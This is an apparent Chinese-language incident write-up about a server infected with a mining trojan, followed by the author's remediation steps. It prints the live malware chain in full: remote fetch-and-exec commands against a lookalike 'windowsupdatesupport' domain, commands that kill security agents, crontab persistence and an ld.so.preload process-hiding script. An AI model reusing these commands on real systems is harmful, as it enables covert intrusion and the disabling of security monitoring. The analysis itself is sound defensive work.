服務器被入侵挖礦過程

事情經(jīng)過

首要問題是保障業(yè)務正?？捎茫谑强焖倮鹆硗庖粋€實例，將業(yè)務遷移過去。接下來， 首先將被入侵服務器關機，然后一步步研究入侵過程，以及其在服務器上的行為。

入侵行為分析

python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()

import sysimport osfrom os.path import expanduserver=sys.version
shs='''ps aux | grep -v grep | grep 'aegis' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'hids' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'cloudwalker' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'titanagent' | awk '{print $11}' | xargs  dirname  | xargs  rm -rfps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'hids' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'edr' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'cloudwalker' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'titanagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'sgagent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'barad_agent' | awk '{print $2}' | xargs  -I {}  kill -9 {}ps aux | grep -v grep | grep 'hostguard' | awk '{print $2}' | xargs  -I {}  kill -9 {}
rm -rf /usr/local/aegisrm -rf /usr/local/qcloudrm -rf /usr/local/hostguard/bin
ps aux | grep -v grep | grep 'kworkers' | awk '{print $2}' | xargs  -I {}  kill -9 {}
'''os.system(shs)domainroota="m.windowsupdatesupport.org"#domainroota="192.168.67.131"#$domainroota#curl  http://$domainroota/d/kworkers -o $gitdir/kworkershomedir=expanduser("~")gitdir=""try:    os.mkdir(homedir+"/.git")except Exception as e:    print(e)if os.path.isdir(homedir+"/.git"):    gitdir=homedir+"/.git"try:    os.mkdir("./.git")except Exception as e:    print(e)if os.path.isdir("./.git"):    gitdir="./.git"downloadu="http://{}/d/kworkers".format(domainroota)if ver.startswith("3"):    import urllib.request    with urllib.request.urlopen(downloadu) as f:        html = f.read()        open(gitdir + "/kworkers", 'wb').write(html)else:    import urllib2    with open(gitdir + "/kworkers", 'wb') as f:        f.write(urllib2.urlopen("http://{}/d/kworkers".format(domainroota)).read())        f.close()print ("Download Complete!")os.system("chmod 777 "+gitdir+"/kworkers")if os.path.isfile('/.dockerenv'):    os.system(gitdir+"/kworkers")else:    os.system("nohup {}/kworkers >>{}/.log&".format(gitdir,gitdir))

遠程代碼主要做了這些事情：

1. 卸載服務器上的安全監(jiān)控工具；事后開機，發(fā)現(xiàn)阿里云盾果然被卸載了
2. 關掉所有kworkers進程；

3. 在當前目錄下創(chuàng)建 .git 目錄，下載并執(zhí)行 kworkers 程序。

服務器殘留痕跡

# crontab -l0 2 * * * /xxx/.git/kworkers

/xxx/.git/xxx/.gitworking dir /xxx from pid 23684version not exist downloadDownloaded: http://m.windowsupdatesupport.org/d/downloadversion not exist dbusDownloaded: http://m.windowsupdatesupport.org/d/dbusversion not exist hideproc.shDownloaded: http://m.windowsupdatesupport.org/d/hideproc.sherror exit status 1version not exist sshkey.shDownloaded: http://m.windowsupdatesupport.org/d/sshkey.shversion not exist autoupdateDownloaded: http://m.windowsupdatesupport.org/d/autoupdateversion not exist kworkersKey path not found/xxx/.gitpassfound  protectedpassfound  providedpassfound  +clientpassfound  +clientpassfound  protectedpassfound  providedpassfound  qualitypassfound  (pluspassfound  (digits,passfound  promptfound aksk xxxx xxxxfound aksk xxxx xxxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxpassfound  xxxlstat /proc/7776/fd/3: no such file or directorylstat /proc/7776/fdinfo/3: no such file or directorylstat /proc/7776/task/7776/fd/3: no such file or directorylstat /proc/7776/task/7776/fdinfo/3: no such file or directorylstat /proc/7776/task/7777/fd/3: no such file or directorylstat /proc/7776/task/7777/fdinfo/3: no such file or directorylstat /proc/7776/task/7778/fd/3: no such file or directorylstat /proc/7776/task/7778/fdinfo/3: no such file or directorylstat /proc/7776/task/7779/fd/3: no such file or directorylstat /proc/7776/task/7779/fdinfo/3: no such file or directorylstat /proc/7776/task/7780/fd/3: no such file or directorylstat /proc/7776/task/7780/fdinfo/3: no such file or directorylstat /proc/7776/task/7781/fd/3: no such file or directorylstat /proc/7776/task/7781/fdinfo/3: no such file or directorylstat /proc/7776/task/7782/fd/3: no such file or directorylstat /proc/7776/task/7782/fdinfo/3: no such file or directorylstat /proc/7776/task/7783/fd/3: no such file or directorylstat /proc/7776/task/7783/fdinfo/3: no such file or directoryrestart cmd  /xxx/.git/kworkers/xxx/.gitpassfound  file,passfound  settingspassfound  file.passfound  callbackspassfound  Callbackpassfound  examplepassfound  promptpassfound  passwordpassfound  informationpassfound  tokenpassfound  tokenpassfound  tokenpassfound  Passwordpassfound  passwordpassfound  passwordpassfound  -basedpassfound  Passwordpassfound  (usingpassfound  field>passfound  retrypassfound  foobarpassfound  foobarpassfound  foobarpassfound  foobarpassfound  foobarpassfound  passwordpassfound  passwordpassfound  foobarpassfound  foobarpassfound  secretrtotal passwords 25xxx.xxx.xxx.xxxlan ipdoscan range  xxx.xxx.0.0/16ping...Receive 24 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 time=496.309μsworking dir /xxx from pid 7792Receive 24 bytes from xxx.xxx.xxx: icmp_seq=0 time=257.973μsxxx.xxx.xxx is alivexxx.xxx.xxx is alivexxx.xxx.xxx:80  openxxx.xxx0xxx:443  openversion  same downloadversion  same dbusrestart dbusexec again dbus downrunkill process pid 23709
process completedversion  same hideproc.shskip restart hideproc.shversion  same sshkey.shskip restart sshkey.shversion  same autoupdateskip restart autoupdateversion  same kworkersKey path not found

1. 對 hideproc.sh 感興趣，其內(nèi)容為：

if [ "$EUID" -ne 0 ]  then echo "Please run as root"else  if [ `grep libc2.28 /etc/ld.so.preload`  ]  then echo "hideproc already done!!"  else    apt-get update -y    apt-get install build-essential -y    yum check-update    yum install build-essential -y    dnf groupinstall "Development Tools" -y    yum group install "Development Tools"  -y    curl http://m.windowsupdatesupport.org/d/processhider.c -o  processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl    mv libc2.28.so /usr/local/lib/ -f    grep libc2.28 /etc/ld.so.preload  || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload    rm -f processhider.c    ls >/tmp/.1  2>&1    grep libc2.28.so /tmp/.1 && echo >/etc/ld.so.preload  fifi

其他信息

除了上述文件，/tmp文件夾下還生成了.1和.1.sh文件；

查詢可疑ip，位于國內(nèi)北京市，應該是肉雞；

查詢木馬下載域名windowsupdatesupport.org，今年6月注冊，解析ip都在國外。該域名很有混淆性，并且為了方便直接用http訪問；

除了下載木馬文件挖礦，未改變服務器上的其他數(shù)據(jù)。

服務器被入侵挖礦解決辦法

apt install -y apache2-utilshtpasswd /etc/nginx/conf.d/.htpasswd user

然后配置 Nginx 使用認證信息：

server {  ...  auth_basic  "子系統(tǒng)鑒權：";  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;  ..}

4、防火墻限制對外連接。

總結

幸運的是這次來的是挖礦木馬，服務器上的程序和數(shù)據(jù)都未受影響。也很感謝阿里云免費的安全提醒，讓我在第一時間處理。

但這次事故也敲醒了警鐘：

1. 不要隨意用 root 權限運行程序；
2. 防火墻權限要嚴格收緊；
3. 做好安全監(jiān)控；
4. 時刻做好數(shù)據(jù)備份。

審核編輯：湯梓紅